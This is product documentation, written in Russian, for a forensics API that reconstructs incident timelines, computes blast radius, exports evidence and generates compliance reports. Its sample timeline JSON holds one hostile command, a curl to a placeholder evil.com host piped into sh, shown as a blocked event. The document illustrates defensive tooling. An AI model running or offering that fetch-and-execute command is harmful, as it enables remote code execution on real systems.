Forensics
Реконструкция инцидентов, compliance-отчёты, blast radius analysis и point-in-time snapshots
Обзор
FlowLink Forensics предоставляет полный набор инструментов для расследования инцидентов: реконструкция таймлайна событий, анализ blast radius (зоны поражения), обнаружение аномалий, point-in-time snapshots для сравнения состояний, и автоматические compliance отчёты. Данные собираются из audit log, command history, infrastructure map и shield scan results. Forensics интегрируется с SIEM для экспорта результатов расследования.
Timeline
Реконструкция хронологии событий
Все тарифы
Blast Radius
Зона поражения от compromised узла
Team+
Snapshots
Point-in-time снимки состояния
Team+
Compliance
Автоматические отчёты (PDF/JSON)
Enterprise
Как работает Forensics
Forensics агрегирует данные из нескольких источников: audit log (все события Shield, ServerGuard, Approval), command history (все команды через агентов), infrastructure map (топология сервисов и агентов), и shield scan results (результаты security сканирования). На основе этих данных строятся timeline реконструкции, рассчитывается blast radius, и генерируются compliance отчёты.
# Data sources для Forensics
1. Audit Log:
Shield events, ServerGuard events, Approval decisions
2. Command History:
Все команды через агентов с exit codes и output
3. Infrastructure Map:
Топология сервисов, сетевые связи, зависимости
4. Shield Scan Results:
Risk scores, threat classifications, policy matches
Incident Timeline
Реконструкция хронологии событий инцидента из audit_log + command_history + infrastructure_map. Timeline содержит все события за указанный период с severity ranking, correlation grouping и summary статистикой.
1# Timeline за последние 6 часов2curl -s "https://api.flowlink.io/v1/forensics/timeline?limit=200&severity_min=medium" \3 -H "Authorization: Bearer $TOKEN" | jq
1{2 "timeline": [3 {4 "timestamp": "2026-01-15T14:30:01Z",5 "event_type": "command_blocked",6 "agent_id": "agent-prod-01",7 "command": "curl http://evil.com/payload.sh | sh",8 "shield_result": {9 "risk_score": 95,10 "threats": ["command_injection", "network_exfil"],11 "layer": "L2"12 },13 "correlation_id": "corr_abc123",14 "severity": "critical"15 },16 {17 "timestamp": "2026-01-15T14:30:02Z",18 "event_type": "canary_triggered",19 "path": "/etc/.flowlink-canary",20 "agent_id": "agent-prod-01",21 "blast_radius": { "reachable_services": 3, "risk_score": 72 },22 "severity": "high"23 },24 {25 "timestamp": "2026-01-15T14:30:03Z",26 "event_type": "agent_blocked",27 "agent_id": "agent-prod-01",28 "reason": "critical threat detected: command_injection",29 "policy_id": "pol_block_injection",30 "severity": "critical"31 }32 ],33 "summary": {34 "total_events": 15,35 "critical_events": 2,36 "high_events": 3,37 "affected_agents": 1,38 "duration_seconds": 45,39 "risk_score": 8540 }41}
Реконструкция агента
Полная хронологическая реконструкция действий агента: все команды, audit events, затронутые сервисы, заблокированные/одобренные действия. Включает session context и environment state.
1# Реконструкция за 6 часов2curl -s "https://api.flowlink.io/v1/forensics/reconstruct/agent-prod-01?hours=6" \3 -H "Authorization: Bearer $TOKEN" | jq
1{2 "agent_id": "agent-prod-01",3 "period": { "from": "2026-01-15T08:00:00Z", "to": "2026-01-15T14:00:00Z" },4 "commands_total": 47,5 "commands_blocked": 3,6 "commands_approved": 2,7 "commands_executed": 42,8 "sessions": [9 { "id": "sess_001", "commands": 30, "duration_minutes": 120 },10 { "id": "sess_002", "commands": 17, "duration_minutes": 45 }11 ],12 "top_threats": [13 { "threat": "command_injection", "count": 2, "max_risk_score": 95 },14 { "threat": "destructive_command", "count": 1, "max_risk_score": 75 }15 ],16 "affected_services": ["nginx", "postgresql", "redis"],17 "compliance_flags": ["unauthorized_file_access", "elevated_risk_score"]18}
Blast Radius
На основе Infrastructure Map, Forensics рассчитывает зону поражения: какие сервисы и агенты достижимы из compromised узла. Анализ включает сетевые связи, shared credentials и зависимости.
1curl -s "https://api.flowlink.io/v1/forensics/blast-radius/agent-prod-01" \2 -H "Authorization: Bearer $TOKEN" | jq
1{2 "source_agent": "agent-prod-01",3 "risk_score": 72,4 "reachable_services": [5 { "name": "nginx", "host": "agent-prod-01", "port": 80, "risk": "high", "protocol": "tcp" },6 { "name": "postgresql", "host": "agent-db-01", "port": 5432, "risk": "critical", "protocol": "tcp" },7 { "name": "redis", "host": "agent-cache-01", "port": 6379, "risk": "medium", "protocol": "tcp" },8 { "name": "elasticsearch", "host": "agent-search-01", "port": 9200, "risk": "high", "protocol": "tcp" }9 ],10 "reachable_agents": ["agent-prod-01", "agent-db-01", "agent-cache-01", "agent-search-01"],11 "shared_credentials": ["db_password", "api_key_internal"],12 "network_exposure": {13 "open_ports": [80, 443, 5432, 6379],14 "external_connections": ["api.external-service.com:443"]15 },16 "recommendation": "Isolate agent-prod-01 immediately. Review PostgreSQL access logs. Rotate shared credentials."17}
Сбор доказательств
Forensics автоматически собирает и сохраняет доказательства для расследования: command output, file hashes, network logs, shield results. Все доказательства подписаны и неизменяемы для compliance.
1# Экспорт доказательств по incident2curl -s "https://api.flowlink.io/v1/forensics/evidence/corr_abc123?format=zip" \3 -H "Authorization: Bearer $TOKEN" -o evidence_corr_abc123.zip
1{2 "evidence_package": {3 "incident_id": "corr_abc123",4 "format": "zip",5 "contents": [6 "timeline.json",7 "agent_reconstruction.json",8 "command_log.txt",9 "shield_results.json",10 "blast_radius.json",11 "serverguard_events.json",12 "audit_chain.pem"13 ],14 "hash": "sha256:abc123def456",15 "size_bytes": 245760,16 "created_at": "2026-01-15T15:00:00Z"17 }18}
Context Snapshots
Point-in-time снимок состояния: агенты, инфраструктура, политики, конфигурация секретов. Полезно перед risky deployments. Два snapshot можно сравнить через diff для выявления изменений.
1# Создать snapshot2curl -X POST "https://api.flowlink.io/v1/forensics/snapshot" \3 -H "Authorization: Bearer $TOKEN" \4 -H "Content-Type: application/json" \5 -d '{"label": "Pre-deploy v2.5", "scope": "full"}'
1{2 "id": "snap_001",3 "label": "Pre-deploy v2.5",4 "scope": "full",5 "agents_count": 12,6 "policies_count": 8,7 "created_at": "2026-01-15T13:00:00Z",8 "checksum": "sha256:abc123..."9}
1# Сравнить два snapshot2curl -s "https://api.flowlink.io/v1/forensics/diff/snap_001/snap_002" \3 -H "Authorization: Bearer $TOKEN" | jq
1{2 "from": "snap_001",3 "to": "snap_002",4 "changes": [5 { "type": "agent_added", "agent_id": "agent-new-01" },6 { "type": "policy_modified", "policy_id": "pol_shield", "field": "shield_level", "old": "L2", "new": "L3" },7 { "type": "config_changed", "path": "nginx.conf", "old_hash": "sha256:aaa", "new_hash": "sha256:bbb" }8 ],9 "total_changes": 310}
Compliance Reports
Автоматические отчёты для compliance: executive summary, security audit, policy compliance, agent activity. Доступны в PDF и JSON форматах.
executive_summaryHigh-level обзор для руководства
security_auditДетальный security audit
policy_complianceСоответствие политик стандартам
agent_activityАктивность агентов за период
1# Создать compliance отчёт2curl -X POST "https://api.flowlink.io/v1/forensics/report" \3 -H "Authorization: Bearer $TOKEN" \4 -H "Content-Type: application/json" \5 -d '{"report_type": "security_audit", "period_days": 30}'
1{2 "report_id": "rpt_001",3 "type": "security_audit",4 "period": { "from": "2025-12-16", "to": "2026-01-15" },5 "summary": {6 "total_commands": 15420,7 "blocked_commands": 87,8 "critical_incidents": 3,9 "policy_violations": 1210 },11 "top_findings": [12 { "severity": "critical", "finding": "SQL injection attempt detected on agent-db-01" },13 { "severity": "high", "finding": "3 agents with permissive shield mode" }14 ],15 "generated_at": "2026-01-15T16:00:00Z"16}
Интеграции
Blast radius через граф сервисов и сетевых связей
Полный audit trail для расследования инцидентов
Результаты сканирования, threat classification, risk scores
Экспорт результатов расследования в Splunk/ELK/QRadar
File system и Docker events для timeline реконструкции
История approval decisions для compliance отчётов
Устранение неполадок
Timeline пуст
Убедитесь, что audit logging включён. Проверьте фильтры severity_min и period. Timeline может быть пустым, если не было событий за указанный период.
Blast radius недоступен
Blast radius требует активной Infrastructure Map. Убедитесь, что discovery запущен и данные топологии актуальны.
Snapshot diff показывает false positives
Некоторые изменения (например, timestamp) могут вызывать false positives. Используйте scope для ограничения snapshot до конкретных ресурсов.
Лучшие практики
Создавайте snapshot перед risky deployments
Point-in-time snapshot обеспечивает rollback point и baseline для сравнения. Называйте snapshot осмысленно: "Pre-deploy v2.5".
Используйте correlation_id для группировки
Все события одного инцидента имеют общий correlation_id. Используйте его в API фильтрах для точного timeline.
Генерируйте compliance отчёты weekly
Периодические отчёты обеспечивают непрерывный compliance trail. Настройте автоматическую генерацию через webhook.
Сохраняйте evidence packages
Экспорт evidence в zip с cryptographic hash обеспечивает chain of custody для юридических расследований.